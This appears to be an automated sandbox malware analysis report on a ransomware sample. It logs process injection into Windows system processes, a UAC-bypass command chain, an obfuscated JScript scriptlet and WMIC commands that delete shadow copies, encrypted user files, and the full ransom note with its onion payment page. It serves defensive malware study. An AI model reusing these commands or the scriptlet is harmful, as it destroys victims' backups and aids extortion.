    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp Binary or memory string: /Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20200930T152422Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b89e401591fe4b0d8cb7204159ee5a88&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
    Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20200930T152422Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b89e401591fe4b0d8cb7204159ee5a88&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
    Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Process information queried: ProcessInformation
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572327 rdtsc

    HIPS / PFW / Operating System Protection Evasion:

    Creates a thread in another existing process (thread injection)
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: C:\Windows\System32\sihost.exe EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: C:\Windows\System32\svchost.exe EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: C:\Windows\System32\taskhostw.exe EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
    Maps a DLL or memory area into another process
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\System32\sihost.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\System32\taskhostw.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
    Modifies the context of a thread in another process (thread injection)
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 2952
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 2996
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3020
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 2736
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3176
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3292
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3528
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3088
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3756
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3688
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 4396
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 4484
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3200
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 5588
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 5648
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 5796
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 6076
    Sets debug register (to hijack the execution of another thread)
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: 2952 1BB026C0AB0
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
    Source: C:\Windows\System32\ComputerDefaults.exe Process created: unknown unknown
    Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
    Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
    Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
    Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: Progman
    Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\sihost.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\taskhostw.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\sihost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
    |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
    | Valid Accounts | Windows Management Instrumentation 21 | Path Interception | Process Injection 412 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 21 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1 |
    | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 1 | LSASS Memory | Virtualization/Sandbox Evasion 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Proxy 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
    | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 412 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
    | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
    | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 2 | LSA Secrets | System Information Discovery 14 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
    | Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |

    Behavior Graph

    [Figure: behavior graph. Behavior Graph ID: 419877; Sample: 7906dc47_by_Libranalysis; Startdate: 21/05/2021; Architecture: WINDOWS; Score: 100]

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    7906dc47_by_Libranalysis.exe | 43% | Virustotal | | Browse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version: 32.0.0 Black Diamond
    Analysis ID: 419877
    Start date: 21.05.2021
    Start time: 19:14:24
    Joe Sandbox Product: CloudBasic
    Overall analysis duration: 0h 8m 42s
    Hypervisor based Inspection enabled: false
    Report type: light
    Sample file name: 7906dc47_by_Libranalysis (renamed file extension from none to exe)
    Cookbook file name: default.jbs
    Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed: 36
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 4
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Detection: MAL
    Classification: mal100.rans.evad.winEXE@57/122@0/0
    EGA Information: Failed
    HDC Information:
    • Successful, ratio: 71.7% (good quality ratio 24.2%)
    • Quality average: 15.2%
    • Quality standard deviation: 25.1%
    HCA Information:
    • Successful, ratio: 98%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
                                                                                                Warnings:
                                                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                • Created / dropped Files have been reduced to 100
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                Time | Type | Description
                                                                                                19:15:18 | API Interceptor | 6x Sleep call for process: WMIC.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                No context

                                                                                                Domains

                                                                                                No context

                                                                                                ASN

                                                                                                No context

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\Public\readme.txt
                                                                                                Process:C:\Windows\System32\taskhostw.exe
                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):332
                                                                                                Entropy (8bit):5.034923816487289
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:RlSJMvj2FvP+GGJ7vzYdEwjk61CNHY/BWcAMHoq8x/1pm49NVOH:RlbrRb0knY/BWP31pm49/s
                                                                                                MD5:718777534403CDCF89B5D9B5F4B2F141
                                                                                                SHA1:3F49F57F3C25D60FEF6D5593C9EB5A69B74A7B29
                                                                                                SHA-256:619DE8A85D1BEAC2E0B2C9CEF08F56FC70859F6F4DD0F763D2175BDAC746B0CB
                                                                                                SHA-512:8018FDBEC663355DB212827869EB7744F615F58DB96E9A12DA248F40979D28D8057BCAB945381E43CB346E0B3DED14743EFD8B47727CA98E32E430B6519D7440
                                                                                                Malicious:true
                                                                                                Preview: <?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t"); </script></registration></scriptlet>.
                                                                                                C:\Users\user\Desktop\EFOYFBOLXA.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.852540487523584
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:qkVevOZPioUIS4cSoGrAej3P/z63aa8rO3GzkiOdD28SKCO0+xB8ZaaJpSjtduq:twvOZPvUIS4cSTrnLD6qawz5OdD8DO1d
                                                                                                MD5:4CA8C9464132BD46B0F34405CA7DBE2B
                                                                                                SHA1:64947AE9858AF884986FECE9B73B8258AD80A8F3
                                                                                                SHA-256:100D4A3CBE30A8CF7F661969551DE09971577017D6880175ACE2D2BA8BB9F7BF
                                                                                                SHA-512:E16FF7FD47974F29695D2DC2BFC9E2DB1568879F70B19ACEE1BD5F0280A817BDEC77280F89A998CF3674EB44CAF107034210A910A08FDB7B9219409829FDD58C
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\EOWRVPQCCS.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.844261606143202
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:oe+60tGOx1aY4e835iW3z09UguJsh3QutwFMV8ZuN/bB9M1HY3FKo:BaV1aY4euAsY9UgOsh37t+9Zuz9M1HY3
                                                                                                MD5:03A68398A3D8E57984C8ED119F0B02B0
                                                                                                SHA1:2197AA2125FBFC2A6D091791088354690FAD35BF
                                                                                                SHA-256:52F566493197EEB8446F9847613B281C2B588A1274EB241A9D64B017BF417527
                                                                                                SHA-512:FD1A883459E2758EF2875082D7A9CA8DA476A5D7F64A59B153A78F88E4B05A51D1C0F218D0F072C3411BF57B4FF9AC13A2CD2CE04DB66C86680AF78B32FE78C3
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.865439143350547
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:EKARLrjmnrHEsjw51wc7Ze+ffas7HbKy3Rf3x0YEd6SntlsiBveeu5rBw1cIyF:EKARLrSrA19e0faSHbh313xPE3t5et5j
                                                                                                MD5:3BC5AAC0E7EC6B8C55AB923884AFAE07
                                                                                                SHA1:04AEDBAE33AB4712458D2B7B051C7D936E7C7C67
                                                                                                SHA-256:5DD70A325B3857CC2FB06E7215F0D0526ED1FF463D99A9020ED316C952C48CEE
                                                                                                SHA-512:1C183B017C9F863A98FD8A1FA25B69C4DED837E34B87C649D82A9B613E85F173F98DD16E5C775987200116DBA50E914C19D18677883F360F9802C2569A8A1EBD
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\BJZFPPWAPT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.848359051937894
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:yWqJgc7r3MsWixduMVCWcHDnzpIpMbbMVri6mNwopwmPPfqrqSWTwdEJ8y+M0OrH:yOk3pxnVCWo1IabbGrifBpTPqrdW8dl8
                                                                                                MD5:8FE121D13E294A65A44DBF601F06798F
                                                                                                SHA1:0314A6286895BD2FC752192117A7DF6BF3D36657
                                                                                                SHA-256:F3422DDC6466F0217229023ADAFD9CB29D44E01DEAF30A1AB9D7D3ED7E15AFBB
                                                                                                SHA-512:3093D2544F9F21FB710FCCA7DB1FE7C3D7C884FBCA42AC80F9A1D72ACE7C0156C986C5C4BE2F4402D1995D201AF618C12A138564F3D9E3C5A0AD3AF8D9CA46B2
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\EEGWXUHVUG.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.853037717976314
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:xLo2GU7pvIxZkUm54UJjX3ZHsMXgbF1n+40cB+CdXP1oZUGKegC3:pH7pvIxaUmyu5sTbTn8CBiWGKK3
                                                                                                MD5:47B15681D80DF13F853FB10AF1A516EF
                                                                                                SHA1:F8B2637CD891AB9BB3EF29E447BE19C879B91575
                                                                                                SHA-256:CB829ABBA7D7E62310193E63948C2B5C4D4C0C833559FF62D2F77A6455A5F79D
                                                                                                SHA-512:04EF64BF1920FA22B7D7E8741DBC8E1DC4CC9A99FDDD64C42DD8BF926B9177F65CD92D3DBC96D1DBD2191A1FBA8B14E24B659D6FB4F44EE1616CA4CBE3521236
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.846258676837589
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:I9wx8zAAEdnldhoiHtqZ0pIvj3IKTiA7wQYff+xTVHIs5+gxIX:se5ZhTIZ0pQlX3Af+L8dX
                                                                                                MD5:4ED6F7C1D874D0870752E38C4776B3F5
                                                                                                SHA1:9291DFFAF5EFA797DE2E926C192F8303417D4CCB
                                                                                                SHA-256:67E1ACB52C374DBA34003BC35390E4097E0F1EAEC7A0255CF4BD0B016C0BC029
                                                                                                SHA-512:F7B7AEE210255254E38E6172DD52F311025EB7017609585CF1B7A3CCC325A643B398E16084DBDC000B8906C1D0C0113D77036D4882D24B384260430BA139C400
                                                                                                Malicious:true
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.849225361374033
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:8MAguY3lD46O4RHb6M9EcuXdH1frzgUZlPuylCBuXcTPa3a20:8jfYVM6Db6M9qLvPVfXcTPaq20
                                                                                                MD5:907738AE77E1AAED2BC9CF52D2D8D4A2
                                                                                                SHA1:7012B3B50CA2EF5F98CF5021CC0DB734655A9081
                                                                                                SHA-256:FB84A5AE9E599E4A2DC556581FC5896054DC158F3872CB04F3A82F52EC8F9369
                                                                                                SHA-512:2DDAE9037671F3C558DD7A09B3005383B0B9D76DFFB7FC0F376C69D83B538968AB9051DC6D5C49351A138AE70E1842ABB77E43B58E8F77F99D70FAC72AAAE9F9
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\ZGGKNSUKOP.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8562989223565785
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FnLTW1h6A3jlMt05FAy91dHVqHBDJ5Kbct1Hb577aSyoR/ekTaECPuHt:FnLS1h6oZ1ds0bwb577aSyyRaE+Yt
                                                                                                MD5:E8F04DC6FD43FD4B70D8CC1675EA8EA3
                                                                                                SHA1:EE3FAFC52DE29D5BB4F8398C575B69652E8C0D79
                                                                                                SHA-256:0A0E9C9E3CFFB856ED9EDB6F4873702113FC381C445DF0217CA5CD2C32878AC7
                                                                                                SHA-512:D81E7522C65CC388587A51C7737F2E45D781AD01C92D0CA8AEE48BD51B29EADFF2C211533A903A26EAD8CD055F2B83E136A2E195DAB2C13A8D78CE6D714518FC
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Desktop\GRXZDKKVDB.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8536323168868485
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:62Fl+wXFYaAEjqSwGpcxY8hxp1WIJA4RsSw0g4F+os/2f6yOay8dnY2VUVCs/JAl:62P+x/E+SpQvp1WIJ/42f6yqyndUVhBY
                                                                                                MD5:5C15A9F8D1923DF59A46DF69778D51E1
                                                                                                SHA1:E6F3BDD5455F724523D63650C3D5E5065901061E
                                                                                                SHA-256:29CB9AF9ECF6B70573E59DE70CD3868FDC2F71F0BA97B38C4A17BA26FCFB561F
                                                                                                SHA-512:2F1D19F7FE5B99F5AC590F141AEBAE952744961B36A4E78CE313300C94A9885D191690382E610F6A7B13343CC1D1FBAFAA130B1396BD15A6EC4AC10F13FC58A0
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\IPKGELNTQY.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8313474040184
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:uN3sLMfy4DR2RvFCYtWXH0lehJFt9xI7cuxPfQ3wT5keE9dC1nw:UOIYYXUleJJxg5Q3wT2eqd3
                                                                                                MD5:33B2A8B97E4964407273674D02DA07E4
                                                                                                SHA1:DB9472D0AF3513940B15B54E71959757B858B3F6
                                                                                                SHA-256:8BBDF00D60F9017A4D6111FEB3B8DF0EA9B739BDBDDF250CDDD40306EE42FD6C
                                                                                                SHA-512:C056D77745B5CC05D62C984C75FDD1262B64555F65CA6AB9237DF986C065AD71BFEAD9E92568B7215E932CA995199DDAAEFC8CE7C7A423438BA0F1A9A61D1FA6
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\GAOBCVIQIJ.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.847448517754549
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:67NZ/4L3JFrRVu811F3cDjcPj4zhHlvY685vagl734wfx5VtHzK2XX3DNysADN:Av4LzrRAc9oc8llvXGT9f3LHzHHcLN
                                                                                                MD5:4B9E9B0A640196E0AE44F3EE0B63EE04
                                                                                                SHA1:1593B7E5D4FA23827BB1D7CEA826B3158FEE943B
                                                                                                SHA-256:B50B586E0A50C4CB252DE4E955319C62C5CCB6427775E716463A6D732DD683D7
                                                                                                SHA-512:D6CA865F534C2E79CAC928741907B092D5835579FD8BC6160ED33D86E722034AD1F26E0935889EB55A9B4DC2901F040FCEE72B69710049580FBC2FDABA812D8A
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\IPKGELNTQY.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.841088143889491
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ljvKFL3rGJ2TDoQ8u3Sdo7GnflJUT1FMI03UylSKVJMxqo46ce35OXGxp4NgtYj5:MdikYXuCdo7GnfcPMJt8pT50WhA3
                                                                                                MD5:338872DC674F7630F9AB23790E98E0E6
                                                                                                SHA1:8EB6CC51803F5403F3DBCB8ECA1D43F2C8DFC8C4
                                                                                                SHA-256:DC70E4F0AD496B24430DEB06CA953D66157860F272B9B95F1007BEC129005232
